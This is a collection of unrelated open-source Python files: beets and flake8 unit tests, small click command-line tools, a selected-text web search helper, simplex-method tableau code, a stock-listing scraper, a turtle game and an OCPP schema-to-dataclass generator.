destination = os.path.join(destdir, 'copied_file.mp3')
item = beets.library.Item.from_path(source)
shutil.copy(source, destination)
self.plugin.on_item_copied(
item, beets.util.bytestring_path(source),
beets.util.bytestring_path(destination),
)
self.plugin.on_cli_exit(None)
# Check source directory
assert os.path.exists(os.path.join(sourcedir, 'file.txt'))
assert os.path.exists(os.path.join(sourcedir, 'file.cue'))
assert os.path.exists(os.path.join(sourcedir, 'file.log'))
assert not os.path.exists(os.path.join(sourcedir, 'audio.log'))
assert not os.path.exists(os.path.join(sourcedir, 'artwork'))
assert os.path.isdir(os.path.join(sourcedir, 'scans'))
assert (set(os.listdir(os.path.join(sourcedir, 'scans'))) ==
set(('front.jpg', 'back.jpg')))
# Check destination directory
assert not os.path.exists(os.path.join(destdir, 'file.txt'))
assert os.path.exists(os.path.join(destdir, 'file.cue'))
assert not os.path.exists(os.path.join(destdir, 'file.log'))
assert os.path.exists(os.path.join(destdir, 'audio.log'))
assert not os.path.exists(os.path.join(destdir, 'scans'))
assert os.path.isdir(os.path.join(destdir, 'artwork'))
assert (set(os.listdir(os.path.join(destdir, 'artwork'))) ==
set(('front.jpg', 'back.jpg')))
def testCopyFilesMultiple(self):
"""Test if extra files are copied for multi-directory imports."""
sourcedir = os.path.join(self.srcdir.name, 'multiple')
destdir = os.path.join(self.dstdir.name, 'multiple')
# Copy first file
source = os.path.join(sourcedir, 'CD1', 'file.mp3')
destination = os.path.join(destdir, '01 - copied_file.mp3')
item = beets.library.Item.from_path(source)
shutil.copy(source, destination)
self.plugin.on_item_copied(
item, beets.util.bytestring_path(source),
beets.util.bytestring_path(destination),
)
# Copy second file
source = os.path.join(sourcedir, 'CD2', 'file.mp3')
destination = os.path.join(destdir, '02 - copied_file.mp3')
item = beets.library.Item.from_path(source)
shutil.copy(source, destination)
self.plugin.on_item_copied(
item, beets.util.bytestring_path(source),
beets.util.bytestring_path(destination),
)
self.plugin.on_cli_exit(None)
# Check source directory
assert os.path.exists(os.path.join(sourcedir, 'file.txt'))
assert os.path.exists(os.path.join(sourcedir, 'CD1', 'file.cue'))
assert os.path.exists(os.path.join(sourcedir, 'CD2', 'file.cue'))
assert os.path.exists(os.path.join(sourcedir, 'file.log'))
assert not os.path.exists(os.path.join(sourcedir, 'audio.log'))
assert not os.path.exists(os.path.join(sourcedir, 'artwork'))
assert os.path.isdir(os.path.join(sourcedir, 'scans'))
assert (set(os.listdir(os.path.join(sourcedir, 'scans'))) ==
set(('front.jpg', 'back.jpg')))
# Check destination directory
assert not os.path.exists(os.path.join(destdir, 'file.txt'))
assert os.path.exists(os.path.join(destdir, 'CD1_file.cue'))
assert os.path.exists(os.path.join(destdir, 'CD2_file.cue'))
assert not os.path.exists(os.path.join(destdir, 'file.log'))
assert os.path.exists(os.path.join(destdir, 'audio.log'))
assert not os.path.exists(os.path.join(destdir, 'scans'))
assert os.path.isdir(os.path.join(destdir, 'artwork'))
assert (set(os.listdir(os.path.join(destdir, 'artwork'))) ==
set(('front.jpg', 'back.jpg')))
class MultiAlbumTestCase(unittest.TestCase):
"""Testcase class that checks if multiple albums are grouped correctly."""
PLUGIN_CONFIG = {
'extrafiles': {
'patterns': {
'log': ['*.log'],
},
},
}
def setUp(self):
"""Set up example files and instanciate the plugin."""
self.srcdir = tempfile.TemporaryDirectory(suffix='src')
self.dstdir = tempfile.TemporaryDirectory(suffix='dst')
for album in ('album1', 'album2'):
os.makedirs(os.path.join(self.dstdir.name, album))
sourcedir = os.path.join(self.srcdir.name, album)
os.makedirs(sourcedir)
shutil.copy(
os.path.join(RSRC, 'full.mp3'),
os.path.join(sourcedir, 'track01.mp3'),
)
shutil.copy(
os.path.join(RSRC, 'full.mp3'),
os.path.join(sourcedir, 'track02.mp3'),
)
logfile = os.path.join(sourcedir, '{}.log'.format(album))
open(logfile, mode='w').close()
# Set up plugin instance
config = beets.util.confit.RootView(sources=[
beets.util.confit.ConfigSource.of(self.PLUGIN_CONFIG),
])
with unittest.mock.patch(
'beetsplug.extrafiles.beets.plugins.beets.config', config,
):
self.plugin = beetsplug.extrafiles.ExtraFilesPlugin('extrafiles')
def tearDown(self):
"""Remove the example files."""
self.srcdir.cleanup()
self.dstdir.cleanup()
def testAlbumGrouping(self):
"""Test if albums are."""
for album in ('album1', 'album2'):
sourcedir = os.path.join(self.srcdir.name, album)
destdir = os.path.join(self.dstdir.name, album)
for i in range(1, 3):
source = os.path.join(sourcedir, 'track{0:02d}.mp3'.format(i))
destination = os.path.join(
destdir, '{0:02d} - {1} - untitled.mp3'.format(i, album),
)
item = beets.library.Item.from_path(source)
item.album = album
item.track = i
item.tracktotal = 2
shutil.copy(source, destination)
self.plugin.on_item_copied(
item, beets.util.bytestring_path(source),
beets.util.bytestring_path(destination),
)
self.plugin.on_cli_exit(None)
for album in ('album1', 'album2'):
destdir = os.path.join(self.dstdir.name, album)
for i in range(1, 3):
destination = os.path.join(
destdir, '{0:02d} - {1} - untitled.mp3'.format(i, album),
)
assert os.path.exists(destination)
assert os.path.exists(os.path.join(
self.dstdir.name, album, '{}.log'.format(album),
))
```
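The fixture hinges on `unittest.mock.patch` used as a context manager: the patched attribute is swapped only for the duration of the block. A minimal self-contained illustration (patching `os.sep` is just a stand-in for the beets config object):
```python
import os
import unittest.mock

# os.sep is patched only inside the with-block, then restored; the tests
# above scope the fake beets config to plugin instantiation the same way.
with unittest.mock.patch("os.sep", "|"):
    assert os.sep == "|"
assert os.sep in ("/", "\\")
```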
|
{
"source": "Jeernej/XLAB_delavnica",
"score": 3
}
|
#### File: XLAB_delavnica/report/main.py
```python
import argparse
import datetime
import getpass
import sys
import openpyxl
from report.db import Database
from report.pdf import Pdf
"""
Main module (command-line program).
"""
class ArgParser(argparse.ArgumentParser):
"""
Argument parser that displays help on error
"""
def error(self, message):
self.print_help()
sys.stderr.write("error: {}\n".format(message))
sys.exit(2)
def _parse_arguments():
parser = ArgParser(
description="Demo report generator",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument("host", help="Database host IP address")
parser.add_argument("port", help="Database host port")
parser.add_argument("user", help="Database user")
parser.add_argument("dbname", help="Database name")
args = parser.parse_args()
    args.password = getpass.getpass()  # assumption: the redacted call prompts for the password via getpass
return args
def main():
args = _parse_arguments()
# Database access
db = Database(args.host, args.port, args.user, args.password, args.dbname)
result = db.execute("select * from store")
print(result)
#http://initd.org/psycopg/docs/usage.html#passing-parameters-to-sql-queries
result = db.execute("select * from rental where rental_date < %s",
(datetime.date(2005, 5, 25),))
print(result)
result = db.execute("select * from rental where rental_date < %(date)s",
{"date": datetime.date(2005, 5, 25)})
print(result)
# Excel writing
wb = openpyxl.Workbook()
ws = wb.active
ws.title = "Data"
titles = "store_id", "manager_staff_id", "address_id", "last_update"
for i, t in enumerate(titles, 1):
ws.cell(1, i, t)
for i, row in enumerate(result, 2):
for j, val in enumerate(row, 1):
ws.cell(i, j, val)
wb.save("sample.xlsx")
# PDF generation
pdf = Pdf("test.pdf")
pdf.set_store_address(("Store A", "My road 3", "another line", "City"))
rows = (
("c1", "c2", "c3"),
("v1", "v2", "v3"),
)
sizes = 20, 30, 10
pdf.add_table(rows, sizes)
pdf.add_paragraph("Long text should this be but there is just no time.")
labels = ("Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug")
data = [
( 13, 5, 20, 22, 37, 45, 19, 4),
( 5, 20, 46, 38, 23, 21, 6, 14),
]
pdf.add_line_chart(140, 70, labels, data)
pdf.add_paragraph("Long text should this be but there is just no time.")
pdf.add_bar_chart(170, 60, labels, data, 0, 60)
pdf.add_paragraph("Long text should this be but there is just no time.")
pdf.add_pie_chart(80, 80, labels, data[0])
pdf.add_pie_chart(80, 80, labels, data[1], side_labels=True)
pdf.add_paragraph("Long text should this be but there is just no time.")
pdf.save()
return 0
```
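The Excel section relies on `enumerate` start offsets to map Python's 0-based indices onto openpyxl's 1-based grid; a standalone sketch of the same pattern (assuming openpyxl is installed):
```python
import openpyxl

wb = openpyxl.Workbook()
ws = wb.active
rows = [("a", 1), ("b", 2)]
for i, title in enumerate(("name", "value"), 1):  # header goes in row 1
    ws.cell(row=1, column=i, value=title)
for i, row in enumerate(rows, 2):                 # data starts at row 2
    for j, val in enumerate(row, 1):
        ws.cell(row=i, column=j, value=val)
wb.save("demo.xlsx")
```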
|
{
"source": "jeertmans/flake8",
"score": 2
}
|
#### File: tests/unit/test_plugin.py
```python
import argparse
import mock
import pytest
from flake8 import exceptions
from flake8.options import manager as options_manager
from flake8.plugins import manager
def test_load_plugin_fallsback_on_old_setuptools():
"""Verify we fallback gracefully to on old versions of setuptools."""
entry_point = mock.Mock(spec=['load'])
plugin = manager.Plugin('T000', entry_point)
plugin.load_plugin()
entry_point.load.assert_called_once_with()
def test_load_plugin_is_idempotent():
"""Verify we use the preferred methods on new versions of setuptools."""
entry_point = mock.Mock(spec=['load'])
plugin = manager.Plugin('T000', entry_point)
plugin.load_plugin()
plugin.load_plugin()
plugin.load_plugin()
entry_point.load.assert_called_once_with()
def test_load_plugin_catches_and_reraises_exceptions():
"""Verify we raise our own FailedToLoadPlugin."""
entry_point = mock.Mock(spec=['load'])
entry_point.load.side_effect = ValueError('Test failure')
plugin = manager.Plugin('T000', entry_point)
with pytest.raises(exceptions.FailedToLoadPlugin):
plugin.load_plugin()
def test_load_noncallable_plugin():
"""Verify that we do not load a non-callable plugin."""
entry_point = mock.Mock(spec=['load'])
entry_point.load.return_value = mock.NonCallableMock()
plugin = manager.Plugin('T000', entry_point)
with pytest.raises(exceptions.FailedToLoadPlugin):
plugin.load_plugin()
entry_point.load.assert_called_once_with()
def test_plugin_property_loads_plugin_on_first_use():
"""Verify that we load our plugin when we first try to use it."""
entry_point = mock.Mock(spec=['load'])
plugin = manager.Plugin('T000', entry_point)
assert plugin.plugin is not None
entry_point.load.assert_called_once_with()
def test_execute_calls_plugin_with_passed_arguments():
"""Verify that we pass arguments directly to the plugin."""
entry_point = mock.Mock(spec=['load'])
plugin_obj = mock.Mock()
plugin = manager.Plugin('T000', entry_point)
plugin._plugin = plugin_obj
plugin.execute('arg1', 'arg2', kwarg1='value1', kwarg2='value2')
plugin_obj.assert_called_once_with(
'arg1', 'arg2', kwarg1='value1', kwarg2='value2'
)
# Extra assertions
assert entry_point.load.called is False
def test_version_proxies_to_the_plugin():
"""Verify that we pass arguments directly to the plugin."""
entry_point = mock.Mock(spec=['load'])
plugin_obj = mock.Mock(spec_set=['version'])
plugin_obj.version = 'a.b.c'
plugin = manager.Plugin('T000', entry_point)
plugin._plugin = plugin_obj
assert plugin.version == 'a.b.c'
def test_register_options():
"""Verify we call add_options on the plugin only if it exists."""
# Set up our mocks and Plugin object
entry_point = mock.Mock(spec=['load'])
plugin_obj = mock.Mock(spec_set=['name', 'version', 'add_options',
'parse_options'])
option_manager = mock.MagicMock(spec=options_manager.OptionManager)
plugin = manager.Plugin('T000', entry_point)
plugin._plugin = plugin_obj
# Call the method we're testing.
plugin.register_options(option_manager)
# Assert that we call add_options
plugin_obj.add_options.assert_called_once_with(option_manager)
def test_register_options_checks_plugin_for_method():
"""Verify we call add_options on the plugin only if it exists."""
# Set up our mocks and Plugin object
entry_point = mock.Mock(spec=['load'])
plugin_obj = mock.Mock(spec_set=['name', 'version', 'parse_options'])
option_manager = mock.Mock(spec=['register_plugin'])
plugin = manager.Plugin('T000', entry_point)
plugin._plugin = plugin_obj
# Call the method we're testing.
plugin.register_options(option_manager)
# Assert that we register the plugin
assert option_manager.register_plugin.called is False
def test_provide_options():
"""Verify we call add_options on the plugin only if it exists."""
# Set up our mocks and Plugin object
entry_point = mock.Mock(spec=['load'])
plugin_obj = mock.Mock(spec_set=['name', 'version', 'add_options',
'parse_options'])
option_values = argparse.Namespace(enable_extensions=[])
option_manager = mock.Mock()
plugin = manager.Plugin('T000', entry_point)
plugin._plugin = plugin_obj
# Call the method we're testing.
plugin.provide_options(option_manager, option_values, None)
# Assert that we call add_options
plugin_obj.parse_options.assert_called_once_with(
option_manager, option_values, None
)
@pytest.mark.parametrize('ignore_list, code, expected_list', [
(['E', 'W', 'F', 'C9'], 'W', ['E', 'F', 'C9']),
(['E', 'W', 'F'], 'C9', ['E', 'W', 'F']),
])
def test_enable(ignore_list, code, expected_list):
"""Verify that enabling a plugin removes it from the ignore list."""
options = mock.Mock(ignore=ignore_list)
optmanager = mock.Mock()
plugin = manager.Plugin(code, mock.Mock())
plugin.enable(optmanager, options)
assert options.ignore == expected_list
def test_enable_without_providing_parsed_options():
"""Verify that enabling a plugin removes it from the ignore list."""
optmanager = mock.Mock()
plugin = manager.Plugin('U4', mock.Mock())
plugin.enable(optmanager)
optmanager.remove_from_default_ignore.assert_called_once_with(['U4'])
```
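Most of these tests lean on `mock.Mock(spec=[...])`, which restricts the mock's surface to the listed attributes; a quick self-contained check:
```python
import unittest.mock as mock

entry_point = mock.Mock(spec=["load"])
entry_point.load()
entry_point.load.assert_called_once_with()
try:
    entry_point.resolve  # not in the spec, so attribute access fails
except AttributeError:
    print("spec'd mocks reject unknown attributes")
```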
|
{
"source": "jeertmans/iunctus",
"score": 2
}
|
#### File: iunctus/cli/add.py
```python
import click
import re
import os
import collections
from iunctus.utils.files import find, filter_file
def preview_files(files, statuses):
if len(files) < 1:
click.echo("No file to preview")
return
colors = ["green", "red", "bright_black"]
messages = ["", " (OVERWRITE)", " (IGNORE)"]
lines = "\n".join(
click.style(file + messages[status], fg=colors[status])
for file, status in zip(files, statuses)
)
C = collections.Counter(statuses)
C0 = C[0]
C1 = C[1]
C2 = C[2]
lines += f"\n\n{len(files)} files: {C0} new, {C1} overwritten and {C2} ignored."
click.echo(lines)
@click.command()
@click.pass_context
@click.argument("path", type=click.Path(exists=True), required=False)
@click.option(
"-p",
"--pattern",
type=str,
multiple=True,
help="REGEX pattern(s) that images files must match.",
)
@click.option(
"-r",
"--recursive",
is_flag=True,
default=False,
help="Search recursively in PATH (default: FALSE).",
)
@click.option(
"-w",
"--preview",
is_flag=True,
default=False,
help="Preview list of images to add and exit.",
)
@click.option(
"-a",
"--any_pattern",
is_flag=True,
default=False,
help="Image paths must match ANY pattern (default: ALL).",
)
@click.option(
"-o",
"--overwrite",
is_flag=True,
default=False,
help="Overwrite image data files when duplicates.",
)
def add(ctxt, path, pattern, recursive, preview, any_pattern, overwrite):
"""
Add image files to the current iunctus project.
"""
if not path:
path = "."
patterns = [re.compile(p) for p in pattern]
files = find(path, recursive)
files = filter(lambda file: filter_file(file, patterns, any_pattern), files)
if preview:
files = list(files)
preview_files(files, [2 for _ in files])
```
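The `multiple=True` option is the key click feature here: repeated `-p` flags accumulate into a tuple. A minimal runnable sketch (the `demo` command is hypothetical, not part of iunctus; assumes click is installed):
```python
import click

@click.command()
@click.option("-p", "--pattern", multiple=True, help="May be given several times.")
def demo(pattern):
    click.echo(f"{len(pattern)} pattern(s): {pattern}")

if __name__ == "__main__":
    demo()  # e.g. python demo.py -p '.*\.jpg' -p '.*\.png'
```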
|
{
"source": "jeertmans/RayTracingInOneWeekend",
"score": 2
}
|
#### File: RayTracingInOneWeekend/rtionewe/cli.py
```python
import click
@click.group(invoke_without_command=True)
@click.option("-W", "--width", default=256, type=int, help="Image width.")
@click.option("-H", "--height", default=256, type=int, help="Image height.")
@click.option("-S", "--size", default=None, type=int, help="Image size.")
@click.option(
"-o",
"--output",
default="out.png",
type=click.Path(dir_okay=False),
help="Output image file.",
)
@click.pass_context
def cli(ctx, width, height, size, output):
if ctx.invoked_subcommand is not None:
return
if size is not None:
width = height = size
from .images import Image
from .scenes import example_scene
from .vectors import ray_color, vector
import numpy as np
array = example_scene(width=width, height=height)
image = Image.from_scene_array(array)
image.save(output)
@cli.command()
def clear_cache():
import os
import shutil
dirname = os.path.dirname(__file__)
shutil.rmtree(os.path.join(dirname, "__pycache__"))
click.secho("Cache folder was cleared!", fg="green")
if __name__ == "__main__":
cli()
```
|
{
"source": "jeertmans/selsearch",
"score": 2
}
|
#### File: selsearch/selsearch/main.py
```python
from .search import search_text
from .selection import get_selected_text
def search_selected_text(where=None):
text = get_selected_text()
search_text(where, text)
```
#### File: selsearch/selsearch/search.py
```python
import urllib.parse
import webbrowser
def search_text(where, text):
urlsafe = urllib.parse.quote(text)
browser = webbrowser.get()
browser.open(f"{where}{urlsafe}")
```
#### File: selsearch/selsearch/selection.py
```python
import os
import platform
import shutil
import time
import pyperclip
from pynput.keyboard import Controller, Key
from .config import get_config
keyboard = Controller()
def get_selected_text_xsel():
return os.popen("xsel").read()
def get_selected_text_alt():
clipboard = pyperclip.paste()
keyboard.release(Key.alt)
with keyboard.pressed(Key.ctrl):
keyboard.press("c")
time.sleep(0.1)
keyboard.release("c")
time.sleep(0.1)
text = pyperclip.paste()
pyperclip.copy(clipboard)
return text
def get_selected_text_mac():
clipboard = pyperclip.paste()
keyboard.release(Key.alt)
with keyboard.pressed(Key.cmd):
keyboard.press("c")
time.sleep(0.1)
keyboard.release("c")
time.sleep(0.1)
text = pyperclip.paste()
pyperclip.copy(clipboard)
return text
config = get_config()
xsel = config["defaults"].getboolean("xsel", False)
if xsel and shutil.which("xsel"):
get_selected_text = get_selected_text_xsel
elif platform.system() == "Darwin":
get_selected_text = get_selected_text_mac
else:
get_selected_text = get_selected_text_alt
```
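`search_text` works because the query is percent-encoded before being appended to the search URL; the URL below is a placeholder, not a selsearch default:
```python
import urllib.parse

query = "metodo simplex & more"
url = "https://duckduckgo.com/?q=" + urllib.parse.quote(query)
print(url)  # '&' becomes %26, spaces become %20
```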
|
{
"source": "jeespoping/metodo_simplex",
"score": 4
}
|
#### File: build/Ejecutable Simplex/Matriz_sig.py
```python
from fractions import Fraction
class Matriz:
def __init__(self,matriz,pivote):
self.matriz = matriz
self.pivotec = pivote[0]
self.pivotef = pivote[1]
self.pivote = matriz[pivote[1]][pivote[0]]
def filasale(self):
for i in range(2):
self.matriz[self.pivotef][i] = self.matriz[i][self.pivotec]
        if self.pivote != 1:
            for i in range(2, len(self.matriz[0])):
                self.matriz[self.pivotef][i] = Fraction(self.matriz[self.pivotef][i], self.pivote)
def demasfilas(self):
for i in range(2,len(self.matriz)-2):
aux = self.matriz[i][self.pivotec]
if(i!=self.pivotef):
for j in range(2,len(self.matriz[0])):
self.matriz[i][j] = self.matriz[i][j] - (aux*self.matriz[self.pivotef][j])
def solucion(self):
fila = len(self.matriz)-2
suma = 0
for i in range(2,len(self.matriz[0])):
for j in range(2,fila):
suma += self.matriz[j][0]*self.matriz[j][i]
self.matriz[fila][i] = suma
suma = 0
def cj(self):
fila = len(self.matriz) - 1
for i in range(3,len(self.matriz[0])):
self.matriz[fila][i] = self.matriz[0][i]-self.matriz[fila-1][i]
def convinar(self):
self.filasale()
self.demasfilas()
self.solucion()
self.cj()
return self.matriz
```
#### File: build/Ejecutable Simplex/Tabla.py
```python
import sympy
class Tabla:
def __init__(self,funcion,variables,restricciones,desig,result):
self.funcion = funcion
self.variables = variables
self.restricciones = restricciones
self.desig = desig
self.result = result
self.matriz = []
def matrizlol(self):
cont = 0
M = sympy.symbols('M')
fila1 = []
fila2 = []
fila3 = []
fila1.append("")
fila1.append("Cj")
fila1.append("")
fila2.append("Cb")
fila2.append("VS")
fila2.append("Sol")
for i in range(len(self.variables)):
fila1.append(int(self.variables[i]))
fila2.append("X%d" % (i + 1))
for i in range(len(self.desig)):
if self.desig[i] == "≤":
fila1.append(0)
fila2.append("S%d" % (i + 1))
elif self.desig[i] == "≥":
fila1.append(0)
fila2.append("S%d" % (i + 1))
cont += 1
else:
cont += 1
for i in range(cont):
if(self.funcion == "Min z"):
fila1.append(M)
else: fila1.append(M*-1)
fila2.append("A%d" % (i + 1))
self.matriz.append(fila1)
self.matriz.append(fila2)
cont = 0
auxva = 0
auxvari = ""
auxA = ""
for i in range(len(self.desig)):
if self.desig[i] == "≤":
auxvari = "S%d" % (i+1)
auxva = 1
fila3.append(0)
fila3.append(auxvari)
elif self.desig[i] == "≥":
auxvari = "S%d" % (i+1)
auxva = -1
auxA = "A%d"%(cont+1)
if (self.funcion == "Min z"):
fila3.append(M)
else:
fila3.append(M * -1)
fila3.append(auxA)
cont += 1
else:
if (self.funcion == "Min z"):
fila3.append(M)
else:
fila3.append(M * -1)
fila3.append("A%d" % (cont + 1))
auxA = "A%d" % (cont + 1)
cont += 1
fila3.append(int(self.result[i]))
for j in range(len(fila2)-3):
if(fila2[j+3][0] == "X"):
fila3.append(int(self.restricciones[i][j]))
elif(fila2[j+3] == auxvari):
fila3.append(auxva)
elif(fila2[j+3] == auxA):
fila3.append(1)
else: fila3.append(0)
auxva = 0
auxvari = ""
auxA = ""
self.matriz.append(fila3.copy())
fila3 = []
self.solucion(M)
self.cj(M)
return self.matriz
def solucion(self,M):
fila4 = []
sum = 0
fila4.append("")
fila4.append("Zj")
for i in range(len(self.matriz[0])-2):
for j in range(len(self.result)):
sum += self.matriz[j+2][0] * self.matriz[j+2][i+2]
fila4.append(sum)
sum=0
self.matriz.append(fila4)
def cj(self,M):
fila5 = []
fila5.append("")
fila5.append("Cj-Zj")
fila5.append("")
for i in range(len(self.matriz[0]) - 3):
fila5.append(self.matriz[0][i+3]-self.matriz[len(self.matriz)-1][i+3])
self.matriz.append(fila5)
```
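The pivot-row division uses `Fraction` so the simplex tableau stays exact across iterations; a small sketch of why that matters:
```python
from fractions import Fraction

row = [3, 1, 5]
pivot = 4
exact = [Fraction(x, pivot) for x in row]
print(exact)                           # [Fraction(3, 4), Fraction(1, 4), Fraction(5, 4)]
assert sum(exact) * pivot == sum(row)  # no rounding drift, unlike floats
```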
|
{
"source": "JeesubKim/stocker",
"score": 3
}
|
#### File: src/monitor/item.py
```python
import threading
from util.pandas import read_html
from db.dbms import DBMS
KOREA_EXCHANGE_URL = 'http://kind.krx.co.kr/corpgeneral/corpList.do?method=download' # Korea Exchange (KRX) listing download URL
COLUMNS = ['회사명','종목코드','업종','주요제품','지역']
COLUMNS_IN_DB = ['name', 'code', 'category', 'product', 'location']
TABLE = 'stock_item'
class StockItem(threading.Thread):
def __init__(self):
super().__init__()
self.db = DBMS()
def run(self):
print('run StockItem')
# 1. retrieve market list from KRX and read tables from html
market_list = read_html(KOREA_EXCHANGE_URL,0,0)
# 2. filter columns with pre-defined list
filtered_list = market_list[COLUMNS]
# 3. insert into database , table : stock_item
for idx in filtered_list.index:
data = dict.fromkeys(COLUMNS_IN_DB)
for col_idx, col in enumerate(COLUMNS_IN_DB):
data[col] = str(filtered_list.iloc[idx][COLUMNS[col_idx]])
code = data['code']
data['code'] = f'00000{code}'[-6:]
self.db.insert(TABLE, data)
# self.db.upsert(TABLE, data)
```
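The `read_html` wrapper is imported from `util.pandas` but not shown; a plausible sketch of what it does with pandas (the signature is assumed, and the real KRX URL needs network access):
```python
import pandas as pd

def read_html(url, table_index=0, header_row=0):
    """Read all HTML tables at url and return the selected one."""
    tables = pd.read_html(url, header=header_row)  # list of DataFrames
    return tables[table_index]
```
The zero-padding step `f'00000{code}'[-6:]` in `run` is equivalent to `str(code).zfill(6)` for codes of up to six digits.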
|
{
"source": "Jeet1243/Mathematizer",
"score": 3
}
|
#### File: Jeet1243/Mathematizer/fibonacci.py
```python
# Function for nth Fibonacci number
def Fibonacci(n):
if n<=0:
print("Incorrect input")
# First Fibonacci number is 0
elif n==1:
return 0
# Second Fibonacci number is 1
elif n==2:
return 1
else:
return Fibonacci(n-1)+Fibonacci(n-2)
# Driver Program
print(Fibonacci(9))
#This code is contributed by <NAME>
```
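The recursive version above recomputes subproblems and is exponential in n; a hedged alternative with `functools.lru_cache` keeps the same recurrence but runs in linear time:
```python
from functools import lru_cache

@lru_cache(maxsize=None)
def fib(n):
    if n <= 0:
        raise ValueError("Incorrect input")
    if n <= 2:
        return n - 1  # fib(1) == 0, fib(2) == 1, matching the version above
    return fib(n - 1) + fib(n - 2)

assert fib(9) == 21  # same result as Fibonacci(9)
```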
#### File: Jeet1243/Mathematizer/turtle.py
```python
import random
import turtle
# function to check whether turtle
# is in Screen or not
def isInScreen(win, turt):
# getting the end points of turtle screen
leftBound = -win.window_width() / 2
rightBound = win.window_width() / 2
topBound = win.window_height() / 2
bottomBound = -win.window_height() / 2
    # getting the current position of the turtle
turtleX = turt.xcor()
turtleY = turt.ycor()
# variable to store whether in screen or not
stillIn = True
# condition to check whether in screen or not
if turtleX > rightBound or turtleX < leftBound:
stillIn = False
if turtleY > topBound or turtleY < bottomBound:
stillIn = False
# returning the result
return stillIn
# function to check whether both turtle have
# different position or not
def sameposition(Red, Blue):
if Red.pos() == Blue.pos():
return False
else:
return True
# main function
def main():
# screen initialization for turtle
wn = turtle.Screen()
# Turtle Red initialization
# instantiate a new turtle object
# called 'Red'
Red = turtle.Turtle()
# set pencolor as red
Red.pencolor("red")
# set pensize as 5
Red.pensize(5)
# set turtleshape as turtle
Red.shape('turtle')
pos = Red.pos()
# Turtle Blue initialization
# instantiate a new turtle object
# called 'Blue'
Blue = turtle.Turtle()
# set pencolor as blue
Blue.pencolor("blue")
# set pensize as 5
Blue.pensize(5)
# set turtleshape as turtle
Blue.shape('turtle')
# make the turtle invisible
Blue.hideturtle()
# don't draw when turtle moves
Blue.penup()
# move the turtle to a location 50
# units away from Red
Blue.goto(pos[0]+50, pos[1])
# make the turtle visible
Blue.showturtle()
# draw when the turtle moves
Blue.pendown()
# variable to store whether turtles
# are in screen or not
mT = True
jT = True
# loop for the game
while mT and jT and sameposition(Red, Blue):
# coin flip for Red
coinRed = random.randrange(0, 2)
# angle for Red
# random.randrange(0, 180)
angleRed = 90
        # condition for left or right
# based on coin
if coinRed == 0:
Red.left(angleRed)
else:
Red.right(angleRed)
# coin flip for Blue
coinBlue = random.randrange(0, 2)
# angle for Blue
# random.randrange(0, 180)
angleBlue = 90
        # condition for left or right based
# on coin
if coinBlue == 0:
Blue.left(angleBlue)
else:
Blue.right(angleBlue)
# draw for Red
Red.forward(50)
# draw for Blue
Blue.forward(50)
        # checking whether turtles are in the
# screen or not
mT = isInScreen(wn, Blue)
jT = isInScreen(wn, Red)
# set pencolor for Blue and Red as black
Red.pencolor("black")
Blue.pencolor("black")
    # condition check for draw or win
if jT == True and mT == False:
        # writing results
Red.write("Red Won", True, align="center",
font=("arial", 15, "bold"))
elif mT == True and jT == False:
        # writing results
Blue.write("Blue Won", True, align="center",
font=("arial", 15, "bold"))
else:
        # writing results
Red.write("Draw", True, align="center",
font=("arial", 15, "bold"))
Blue.write("Draw", True, align="center",
font=("arial", 15, "bold"))
# exit on close
wn.exitonclick()
# Calling main function
main()
```
|
{
"source": "jeet777/PyOcpp",
"score": 3
}
|
#### File: PyOcpp/scripts/schema_to_dataclass.py
```python
import sys
import re
import json
from pathlib import Path
map_schema_type_to_python = {
"object": "Dict",
"array": "List",
"integer": "int",
"string": "str",
"number": "int",
"boolean": "bool",
"any": "Any",
}
def create_dataclass(name):
return dataclass(name)
def create_attribute(name, type, required):
name = re.sub('([a-z0-9])([A-Z])', r'\1_\2', name).lower()
type = map_schema_type_to_python[type]
return attribute(name, type, required)
class dataclass:
def __init__(self, name):
self.name = name
self.attrs = []
def add_attr(self, attr):
self.attrs.append(attr)
def __str__(self):
output = f"@dataclass\nclass {self.name}Payload:\n"
if len(self.attrs) == 0:
return output + " pass\n"
optional_attrs = ""
for attr in self.attrs:
if attr.required:
output += str(attr)
else:
optional_attrs += str(attr)
return output + optional_attrs
class attribute:
def __init__(self, name, type, required):
self.name = name
self.type = type
self.required = required
def __str__(self):
name = self.name
if not re.match("^[a-zA-Z_]", self.name):
name = "_" + self.name
definition = f" {name}: {self.type}"
if self.required is True:
# if self.type == "Dict":
# definition += " = field(default_factory=dict)\n"
# elif self.type == "List":
# definition += " = field(default_factory=list)\n"
# else:
definition += "\n"
else:
definition += " = None\n"
return definition
def __repr__(self):
return f"<{self.name}, {self.type}, {self.required}> "
calls = []
call_results = []
def parse_schema(schema):
with open(schema, "r") as f:
schema = json.loads(f.read())
name = schema['$id'].split(":")[-1]
call = False
call_result = False
if name.endswith("Request"):
call = True
elif name.endswith("Response"):
call_result = True
dc = create_dataclass(name)
try:
properties = schema['properties']
except KeyError:
if call:
calls.append(dc)
elif call_result:
call_results.append(dc)
return
for property, definition in properties.items():
if property == "customData":
continue
required = True
try:
required = property in schema['required']
except KeyError:
required = False
try:
type = definition['type']
except KeyError:
try:
ref = definition['$ref'].split('/')[-1]
type = schema['definitions'][ref]['type']
except KeyError:
if definition == {}:
type = "any"
attr = create_attribute(property, type, required)
dc.add_attr(attr)
if call:
calls.append(dc)
elif call_result:
call_results.append(dc)
if __name__ == '__main__':
if len(sys.argv) != 2:
print("Pass path to folder with schemas")
sys.exit(-1)
p = Path(sys.argv[1])
schemas = list(p.glob("*.json"))
for schema in schemas:
parse_schema(schema)
with open('call.py', 'wb+') as f:
f.write(b"from typing import Any, Dict, List\n")
f.write(b"from dataclasses import dataclass, field, Optional")
for call in sorted(calls, key=lambda call: call.name):
f.write(b"\n\n")
f.write(str(call).encode('utf-8'))
with open('call_result.py', 'wb+') as f:
f.write(b"from typing import Any, Dict, List\n")
f.write(b"from dataclasses import dataclass, field")
for call in sorted(call_results, key=lambda call: call.name):
f.write(b"\n\n")
f.write(str(call).encode('utf-8'))
```
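The camelCase-to-snake_case conversion in `create_attribute` is the one subtle regex in this script; a standalone check:
```python
import re

def to_snake(name):
    return re.sub("([a-z0-9])([A-Z])", r"\1_\2", name).lower()

assert to_snake("chargePointVendor") == "charge_point_vendor"
assert to_snake("evseId") == "evse_id"
```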
|